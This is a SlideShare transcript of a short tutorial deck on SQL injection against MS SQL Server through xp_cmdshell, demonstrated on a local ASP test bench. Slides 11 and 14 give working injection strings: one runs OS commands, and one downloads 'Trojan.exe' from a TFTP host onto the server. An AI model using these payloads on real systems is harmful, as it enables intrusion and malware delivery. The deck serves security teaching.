SlideShare a Scribd company logo

Sql injection exploit

Download as PPTX, PDF
V
Varun_duggal457

This document discusses advanced SQL injection techniques. It begins by defining SQL injection as injecting SQL commands into a database through an application. Many applications and programming languages are vulnerable if they use user input in SQL statements. Stored procedures like xp_cmdshell in Microsoft SQL Server allow executing operating system commands, which can be exploited. The document demonstrates SQL injection on a vulnerable ASP site connected to SQL Server 2000 to execute commands like ipconfig and upload a file via tftp.

1 of 15
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 Advanced Exploitation using SQL Injection  By Varun Duggal  Work in Application Security Domain
SQL Injection  The ability to inject SQL commands into the database engine through an existing application  SQL Injection occurs when user-supplied data is sent to an interpreter as part of a command or query  Attackers trick the interpreter into executing unintended commands via supplying specially crafted data  Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application
Vulnerable Applications  Almost all SQL databases and programming languages are potentially vulnerable  MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc  Accessed through applications developed using:  Perl and CGI scripts that access databases  ASP, JSP, PHP  XML, XSL and XSQL  Javascript  VB, MFC, and other ODBC-based tools and APIs  DB specific Web-based applications and API‟s  Reports and DB Applications  3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)  many more
Stored procedure  A stored procedure is a subroutine available to applications accessing a relational database system  Stored procedures (sometimes called a sproc or SP) are actually stored in the database data dictionary
Exploiting the Vulnerability  xp_cmdshell stored procedure, which is built into MS-SQL by Default  Allows users to execute operating system commands
Tasks  Executing any type OS commands  Ping Server  Directory Listing  Create File  Defacing Website  Execute Applications  Upload and Download files
More Stored Procedures  (xp_cmdshell)  (xp_regread)  (xp_servicecontrol)  (xp_availablemedia)  (xp_enumdsn)  (xp_loginconfig)  (xp_makecab)  (xp_ntsec_enumdomains)  (xp_terminate_process)
Demo  Test Bench  O. S : Windows XP Professional  Frontend: ASP  Backend: MSSQL 2000  Web Server: IIS 5.0
 Open the URL in the http://localhost/sql.asp?id=1
Checking Vulnerable or Not  Enter a single quote in the id parameter the error message indicates it‟s vulnerable to SQL Injection.
 Now open the URL and run the command „;exec master..xp_cmdshell “ ipconfig > c:inetpubwwwroottest.txt”--
 Now finally file created on the web server access that file as shown in the below snapshot:
Upload a file on the server  Open tftp server containing malicious code to be uploaded
 Now open the URL and run the command  „;exec master..xp_cmdshell “tftp –i 192.168.1.5 GET Trojan.exe C:Trojan.exe”--
 Logs of Tftp shows file gets uploaded on the server

More Related Content

PPTX
Os Command Injection Attack
Raghav Bisht
 
PDF
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
Vladimir Arutin
 
PPTX
Sql Injection
penetration Tester
 
PPT
IIS 6.0 and asp.net
Rishi Kothari
 
PPT
Anypoint data gateway
Praneethchampion
 
PPTX
Flows in mule
Sindhu VL
 
PPTX
Mule validators
krishashi
 
PPT
Understanding IIS
Om Vikram Thapa
 
Os Command Injection Attack
Raghav Bisht
 
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
Vladimir Arutin
 
Sql Injection
penetration Tester
 
IIS 6.0 and asp.net
Rishi Kothari
 
Anypoint data gateway
Praneethchampion
 
Flows in mule
Sindhu VL
 
Mule validators
krishashi
 
Understanding IIS
Om Vikram Thapa
 

What's hot (20)

PPTX
Web Security
Rita Mehra
 
PPTX
How to Monitor IIS
Power Admin LLC
 
PPTX
ASP.NET Request Processing Internals
Abhijit Jana
 
PPT
Websphere - Introduction to logs and configuration
Vibrant Technologies & Computers
 
PPT
Securing you SQL Server - Denver, RMTT
Gabriel Villa
 
PPTX
Automated Testing Of EPiServer CMS Sites
joelabrahamsson
 
PPTX
Mule Soft ESB - SAP Outbound
akashdprajapati
 
PPTX
Database component in mule
Rajkattamuri
 
PPT
Mulesoft debug
keshav Naidu
 
PPTX
How Spring Framework Really Works?
NexSoftsys
 
PPTX
Securing Your WordPress Website
RightMix Technologies LLP
 
PPT
Understanding iis part1
Om Vikram Thapa
 
PDF
Selenium Automation Framework (SAF).
Mindtree Ltd.
 
PPTX
Sql injection brief for slideshare
Frank Rietta
 
PPTX
Chapter 5
application developer
 
PPTX
spring framework ppt by Rohit malav
Rohit malav
 
PPTX
Mule ESB - Intra application communication
krishananth
 
PDF
C sharp and asp.net interview questions
Akhil Mittal
 
PPT
Subversion
wiradikusuma
 
PPTX
Security Model in .NET Framework
Mikhail Shcherbakov
 
Web Security
Rita Mehra
 
How to Monitor IIS
Power Admin LLC
 
ASP.NET Request Processing Internals
Abhijit Jana
 
Websphere - Introduction to logs and configuration
Vibrant Technologies & Computers
 
Securing you SQL Server - Denver, RMTT
Gabriel Villa
 
Automated Testing Of EPiServer CMS Sites
joelabrahamsson
 
Mule Soft ESB - SAP Outbound
akashdprajapati
 
Database component in mule
Rajkattamuri
 
Mulesoft debug
keshav Naidu
 
How Spring Framework Really Works?
NexSoftsys
 
Securing Your WordPress Website
RightMix Technologies LLP
 
Understanding iis part1
Om Vikram Thapa
 
Selenium Automation Framework (SAF).
Mindtree Ltd.
 
Sql injection brief for slideshare
Frank Rietta
 
Chapter 5
application developer
 
spring framework ppt by Rohit malav
Rohit malav
 
Mule ESB - Intra application communication
krishananth
 
C sharp and asp.net interview questions
Akhil Mittal
 
Subversion
wiradikusuma
 
Security Model in .NET Framework
Mikhail Shcherbakov
 
Ad

Viewers also liked (10)

PDF
Thick Application Penetration Testing - A Crash Course
NetSPI
 
PDF
The API Primer (OWASP AppSec Europe, May 2015)
Greg Patton
 
PPTX
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 
PDF
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
 
PDF
pentest mobile app issue
shekar M
 
PDF
Developing Secure Mobile Applications
Denim Group
 
PDF
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
PDF
Pactera Cybersecurity - Application Security Penetration Testing - Mobile, We...
Kyle Lai
 
PPTX
Fortify On Demand and ShadowLabs
jasonhaddix
 
PPTX
Threat Exposure Management - Reduce your Risk of a Breach
Rahul Neel Mani
 
Thick Application Penetration Testing - A Crash Course
NetSPI
 
The API Primer (OWASP AppSec Europe, May 2015)
Greg Patton
 
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
 
pentest mobile app issue
shekar M
 
Developing Secure Mobile Applications
Denim Group
 
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
Pactera Cybersecurity - Application Security Penetration Testing - Mobile, We...
Kyle Lai
 
Fortify On Demand and ShadowLabs
jasonhaddix
 
Threat Exposure Management - Reduce your Risk of a Breach
Rahul Neel Mani
 
Ad

Similar to Sql injection exploit (20)

PPT
SQL Server Security - Attack
webhostingguy
 
PDF
Sql injection manish file
yukta888
 
PPTX
Understanding and preventing sql injection attacks
Kevin Kline
 
PDF
Sql Injection 0wning Enterprise
n|u - The Open Security Community
 
PPTX
CLR Stored Procedures
Harshana Weerasinghe
 
PDF
Web Application Security 101 - 14 Data Validation
Websecurify
 
PPTX
Day2
madamewoolf
 
PPT
Hackers Paradise SQL Injection Attacks
amiable_indian
 
PDF
Attques web
Tarek MOHAMED
 
PPT
Advanced sql injection
badhanbd
 
PPTX
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
 
PPTX
OWASP_Top_Ten_Proactive_Controls_v2.pptx
johnpragasam1
 
PPTX
OWASP_Top_Ten_Proactive_Controls version 2
ssuser18349f1
 
PPT
Microsoft Operating System Vulnerabilities
Information Technology
 
PPT
Microsoft OS Vulnerabilities
SecurityTube.Net
 
PPT
Ch08 Microsoft Operating System Vulnerabilities
phanleson
 
PPTX
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
 
PPTX
OWASP_Top_Ten_Proactive_Controls_v32.pptx
nmk42194
 
PPT
Perfsystems- Consulting Services
Perfsys Tems
 
ODP
Dynamic Slides using OpenOffice.org Impress and Python
Carles Pina Estany
 
SQL Server Security - Attack
webhostingguy
 
Sql injection manish file
yukta888
 
Understanding and preventing sql injection attacks
Kevin Kline
 
Sql Injection 0wning Enterprise
n|u - The Open Security Community
 
CLR Stored Procedures
Harshana Weerasinghe
 
Web Application Security 101 - 14 Data Validation
Websecurify
 
Day2
madamewoolf
 
Hackers Paradise SQL Injection Attacks
amiable_indian
 
Attques web
Tarek MOHAMED
 
Advanced sql injection
badhanbd
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
johnpragasam1
 
OWASP_Top_Ten_Proactive_Controls version 2
ssuser18349f1
 
Microsoft Operating System Vulnerabilities
Information Technology
 
Microsoft OS Vulnerabilities
SecurityTube.Net
 
Ch08 Microsoft Operating System Vulnerabilities
phanleson
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
nmk42194
 
Perfsystems- Consulting Services
Perfsys Tems
 
Dynamic Slides using OpenOffice.org Impress and Python
Carles Pina Estany
 

Sql injection exploit

  • 1.  Advanced Exploitation using SQL Injection  By Varun Duggal  Work in Application Security Domain
  • 2. SQL Injection  The ability to inject SQL commands into the database engine through an existing application  SQL Injection occurs when user-supplied data is sent to an interpreter as part of a command or query  Attackers trick the interpreter into executing unintended commands via supplying specially crafted data  Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application
  • 3. Vulnerable Applications  Almost all SQL databases and programming languages are potentially vulnerable  MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, Informix, etc  Accessed through applications developed using:  Perl and CGI scripts that access databases  ASP, JSP, PHP  XML, XSL and XSQL  Javascript  VB, MFC, and other ODBC-based tools and APIs  DB specific Web-based applications and API‟s  Reports and DB Applications  3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)  many more
  • 4. Stored procedure  A stored procedure is a subroutine available to applications accessing a relational database system  Stored procedures (sometimes called a sproc or SP) are actually stored in the database data dictionary
  • 5. Exploiting the Vulnerability  xp_cmdshell stored procedure, which is built into MS-SQL by Default  Allows users to execute operating system commands
  • 6. Tasks  Executing any type OS commands  Ping Server  Directory Listing  Create File  Defacing Website  Execute Applications  Upload and Download files
  • 7. More Stored Procedures  (xp_cmdshell)  (xp_regread)  (xp_servicecontrol)  (xp_availablemedia)  (xp_enumdsn)  (xp_loginconfig)  (xp_makecab)  (xp_ntsec_enumdomains)  (xp_terminate_process)
  • 8. Demo  Test Bench  O. S : Windows XP Professional  Frontend: ASP  Backend: MSSQL 2000  Web Server: IIS 5.0
  • 9.  Open the URL in the http://localhost/sql.asp?id=1
  • 10. Checking Vulnerable or Not  Enter a single quote in the id parameter the error message indicates it‟s vulnerable to SQL Injection.
  • 11.  Now open the URL and run the command „;exec master..xp_cmdshell “ ipconfig > c:inetpubwwwroottest.txt”--
  • 12.  Now finally file created on the web server access that file as shown in the below snapshot:
  • 13. Upload a file on the server  Open tftp server containing malicious code to be uploaded
  • 14.  Now open the URL and run the command  „;exec master..xp_cmdshell “tftp –i 192.168.1.5 GET Trojan.exe C:Trojan.exe”--
  • 15.  Logs of Tftp shows file gets uploaded on the server